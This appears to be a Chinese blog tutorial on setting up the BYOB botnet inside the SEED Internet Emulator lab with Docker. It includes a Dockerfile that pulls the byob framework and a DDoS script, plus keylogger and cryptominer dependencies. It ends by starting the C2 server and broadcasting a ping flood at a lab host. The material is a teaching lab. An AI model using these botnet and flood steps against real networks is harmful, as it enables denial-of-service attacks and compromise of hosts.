Seed Emulator(二)—— Botnet

最新推荐文章于 2022-08-15 18:32:00 发布
最新推荐文章于 2022-08-15 18:32:00 发布
阅读量1.1k 收藏 6
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43498820/article/details/119832384
版权

0x01 搭建botnet环境

1. 构建基础网络模型

# 进入B00迷你网络模型
cd seed/examples/B00-mini-internet

# 运行脚本生成base-component.bin
python3 mini-internet.py

 2. 生成Botnet网络设备

# 进入B05僵尸网络
cd seed/examples/B05-botnet

# 运行脚本生成 output容器目录
python3 botnet-basic.py

3. 修改部分dockerfile

   进入output目录,找到与以下命名规则匹配的文件夹

hnode_15[x]_[乱码]
例如:
    hnode_150_kmfbezhdcx
    hnode_152_osailwzkde
其中150表示bot-controller,是攻击者
151-154表示被控制的设备

  进入该文件夹hnode_150_kmfbezhdcx修改dockerfile(可不进行修改)

  注意:每一个文档都是随机生成的,直接在相应的地方添加或修改。

FROM cfee3a34e9c68ac1d16035a81a926786
ARG DEBIAN_FRONTEND=noninteractive
RUN echo 'exec zsh' > /root/.bashrc
RUN apt-get update && apt-get install -y --no-install-recommends curl dnsutils ipcalc iproute2 iputils-ping jq mtr-tiny nano netcat tcpdump termshark vim-nox zsh
RUN apt-get update && apt-get install -y --no-install-recommends cmake g++ gcc git make python3 python3-dev python3-pip
RUN curl -L https://grml.org/zsh/zshrc > /root/.zshrc
RUN git clone https://github.com/malwaredllc/byob.git /tmp/byob/
RUN git -C /tmp/byob/ checkout 3924dd6aea6d0421397cdf35f692933b340bfccf
RUN pip3 install -r /tmp/byob/byob/requirements.txt
##### 添加下面这行#####
RUN pip3 install scapy  
######################
COPY 082b96ec819c95ae773daebde675ef80 /start.sh
COPY d18858afc6bb66ec3a19d872077acfd2 /seedemu_sniffer
COPY 17ac2d812a99a91e7f747e1defb72a29 /seedemu_worker
RUN chmod +x /start.sh
RUN chmod +x /seedemu_sniffer
RUN chmod +x /seedemu_worker
COPY e01e36443f9f72c6204189260d0bd276 /ifinfo.txt
COPY d3d51fdf7f4bad30dc5db560a01ce629 /interface_setup
COPY da400a91fea872a8847da984d17ad711 /tmp/ddos.py
COPY 723b26ed8d806472d9da31e9f6fbedd2 /tmp/byob.patch
COPY e186feb0df9ee7d0d4c2482c5fb9824f /tmp/byob_server_init_script
COPY 947cdbadb86f3cf687a8586c1dfc911c /bin/start-byob-shell
CMD ["/start.sh"]

  进入该文件夹hnode_151——hnode_153,在文件夹下添加requirements文件,内容如下。

py-cryptonight>=0.2.4
git+https://github.com/jtgrassie/pyrx.git#egg=pyrx

mss==5.0.0;python_version>'3'
WMI==1.4.9;python_version>'3'
numpy==1.18.1;python_version>'3'
pyxhook==1.0.0;python_version>'3'
twilio==6.35.4;python_version>'3'
colorama==0.4.3;python_version>'3'
requests==2.22.0;python_version>'3'
PyInstaller==3.6;python_version>'3'
pycryptodome==3.9.6;python_version>'3'
pycrypto==2.6.1;python_version>'3'

mss==3.3.0;python_version<'3'
WMI==1.4.9;python_version<'3'
numpy==1.15.2;python_version<'3'
pyxhook==1.0.0;python_version<'3'
twilio==6.14.0;python_version<'3'
colorama==0.3.9;python_version<'3'
requests==2.20.0;python_version<'3'
PyInstaller==3.6;python_version<'3'
pycryptodomex==3.8.1;python_version<'3'

opencv-python==3.4.3.18;python_version<'3'

pyHook==1.5.1;sys.platform=='win32'
pypiwin32==223;sys.platform=='win32'

  修改dokerfile

# 第7行内容
RUN curl https://raw.githubusercontent.com/malwaredllc/byob/3924dd6aea6d0421397cdf35f692933b340bfccf/byob/requirements.txt > /tmp/byob-requirements.txt

# 修改为
COPY requirements /tmp/byob-requirements.txt

 原因是curl的网址在国内无法访问,所以挂了一个梯子,先把文件下下来,再添加进去就可以了。

4. 启动Botnet

cd seed/examples/B05-botnet/output

sudo docker-compose build && sudo docker-compose up
# 启动过程比较慢,多等一会

启动成功之后

 5. 启动 Seedemu Web 客户端

# 进入根目录下的client文件夹
cd seed/client

# 构建并运行容器
sudo docker-compose build && sudo docker-compose up

0x02 DDOS攻击

1. 配置Bot-controller

找到地图中的Bot-Controller,点击右侧边框中Lanch Console,即可进入console

# 进入 /tmp/byob/byob目录
cd /tmp/byob/byob

# 执行server.py文件 启动服务器
python3 server.py --port 445

启动服务器后,等待客户端连接

 2. DDOS攻击

在网页中的filter中填入ICMP,打开下方的log,在Bot-Controller的console中输入

broadcast ping -c 300 -s 5000 10.161.0.71

可以在地图上看到,数据包的传递路径。

 0x03 检测方法

         http://blog.chinaunix.net/uid-20597254-id-1918281.html

Lous1x
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
SEED-XDS510Plus Emulator for CCS4.3
03-07
SEED-XDS510Plus Emulator CCS4.3 dsp仿真器驱动 这么多
SEED-XDS510Plus Emulator for CCS4.x_x64
11-28
SEED-XDS510Plus Emulator for CCS4.x_x64
seed-emulator:自建任意小型网络并成功编译+可视化+ping通
捡破烂日记^ ^
03-08 5923
自建小网络遇到的问题设计的小小网络拓扑代码最终成型连通性反思与总结 遇到的问题 首先说明一下我遇到的三个问题: 第一就是关于[]的疑惑,加与不加会有什么不同吗? 第是我自己设计了一个网络拓扑,但是总是出现这个问题 就是线程池冲突。我折腾了一早上本来准备早早改完bug下午实现自动化脚本了,结果愣是没发现问题在哪;到了晚上我寻思着重新实现一个不带这一块拓扑结构的(因为我也觉得可能有点问题),结果就正常通过可视化工作了。按理说一个router是可以连接3个net的,以及我试过杀掉其他docker进程,但是似乎
SEED-XDS510Plus Emulator for CCS4.x&Above.exe
07-19
SEED-XDS510Plus Emulator for CCS4.x&Above.exe
使用SEED互联网平台仿真器创建小型网络(python程序)
捡破烂日记^ ^
03-04 4145
本文是基于seed emulator 以一种通用思路搭建网络,今后网络均可参考 from seedemu import * # 为方便起见import 所有library emu = Emulator() # 大部分情况下import一个emulator就够了 base = Base() # Base layer的创建
SEED-XDS510Plus Emulator for CCS3.3 Below
05-16
SEED-XDS510Plus Emulator for CCS3.3 Below 仿真器驱动
SEED-XDS560Plus Emulator x64
09-10
最新的XDS560Plus仿真器驱动,支持CCS3.1、CCS3.3、CCS4及其以上版本 XDS560PLUSV2.8及其以上硬件版本可以支持x64,v2.6兼容性存在一定问题,部分PC不支持
Android 实用工具之emulator介绍
09-05
**Android Emulator详解** 在Android开发过程中,Android Emulator是一个至关重要的工具,它允许开发者在没有物理设备的情况下测试和调试应用程序。Emulator是Android SDK的一部分,位于`android-sdk\tools`目录下...
cdrom.rar_emulator
09-23
在虚拟化技术领域,QEMU(Quick Emulator)是一款强大的开源模拟器,它允许用户在无需物理硬件的情况下运行多种操作系统。其中,ATAPI(Advanced Technology Attachment Packet Interface)CD-ROM 模拟器是QEMU中的...
SEED-XDS560v2PLUS Emulator Driver (4.x)
10-19
SEED-XDS560v2PLUS Emulator Driver (4.x)
BOTNET 原代码
12-07
BOTNET 原代码 其作用 不言自明 大家看看把
BotNET-开源
04-30
功能包括:身份验证,通道控制,功能齐全的Memo系统,Seen系统,日志记录功能,帮助系统,充当文件共享节点的能力以及共享数据和与其他bot一起执行功能的能力。
BOTNET-HTTP
03-25
BOTNET-HTTP
Python 创建自己的交互式Shell和BotNet实现远程控制
12-21
Python 远程控制 本文仅为传递技术,如您用于非法用途,我们不会也不可能承担任何责任 本文由中国秦川联盟旗下氢氟安全组撰写,原文来自于中国秦川联盟博客(他*的这几天服务器崩了),我们不希望您转载本文,如果有非法爬虫爬取本文,本声明依然奏效,中国秦川联盟有权追责 以上声明将会覆盖 CC 4.0 BY-SA 部分协议,为防止爬虫,这里附上本文链接https://blog.csdn.net/weixin_42660646/article/details/105276372,如有发现,希望大家联系我或者直接联系作者删除,谢谢 网络上有很多远程控制的Python脚本,譬如TCP/IP反弹式Shell
Seed Emulator(一)—— 环境搭建
qq_43498820的博客
08-18 1674
0x01 环境准备 操作系统:ubuntu20.04 安装 docker-compose sudo apt-get install docker-compose 安装docker sudo apt-get install docker 下载seed-emulator-master git clone https://github.com/seed-labs/seed-emulator.git 0x02 测试案例运行 接下来使用项目中exa
在VirtualBox上自己搭建SEEDEmulator虚拟机(Ubuntu20.04内含Ubuntu22.04地址)
m0_52559974的博客
08-15 2111
从今天起打算搭一个虚拟机,配置docker容器,安装互联网模拟器,尝试一些实验。此篇为在VirtualBox上搭建虚拟机,环境为Ubuntu22.04。下一篇介绍docker的配置和互联网模拟器SEED
seed emulator docker环境下进行telnet弱密码攻击
捡破烂日记^ ^
05-05 300
1 原理 很简单,就是host B想远程登录到host A,需要试密码 2 部署与攻击 2.1 host A: 2.1.1 预装telnet、telnetd、iptables、openbsd-inetd软件 使用apt-get install 就可以。 2.1.2 开启23端口并重启服务 iptables -I INPUT -p tcp --dport 23 -j ACCEPT cd etc/init.d ./openbsd-inetd restart 这样就开启服务了,不放心的话可以再装一个lsof软件
seed emulator 环境下对网络拓扑进行bgp攻击
捡破烂日记^ ^
04-21 343
正常路径: 最左结点 ping 10.154.0.71(最右节点) filter写icmp,如果显示来去路径则不一致,再添上&&dst = 10.154.0.71 选取任意其他连通的router(注意不是主机,只有router才有bird)进行bgp攻击,修改conf文件 cd /etc cd bird vi bird.conf 在最末尾加上这个 protocol static hijacks{ ipv4{ table t_bgp; }; rout
保姆级 seed-emulator环境下进行缓冲区溢出攻击
捡破烂日记^ ^
05-05 329
1 软件需求 apt-get install gcc apt-get install libc6-dev #这个是为了32位环境 2 前期准备 2.1 创建badfile touch badfile 2.2 创建stack.c /* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task is to exploit this vulnerability */ #include <stdlib.h&
sential hl emulator
最新发布
01-24
sential hl emulator是一个用于模拟Sential HL加密狗的软件工具。Sential HL加密狗是一种用于存储和保护软件许可证和机密数据的硬件设备。通过使用sential hl emulator,用户可以在不使用实际Sential HL加密狗的情况...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值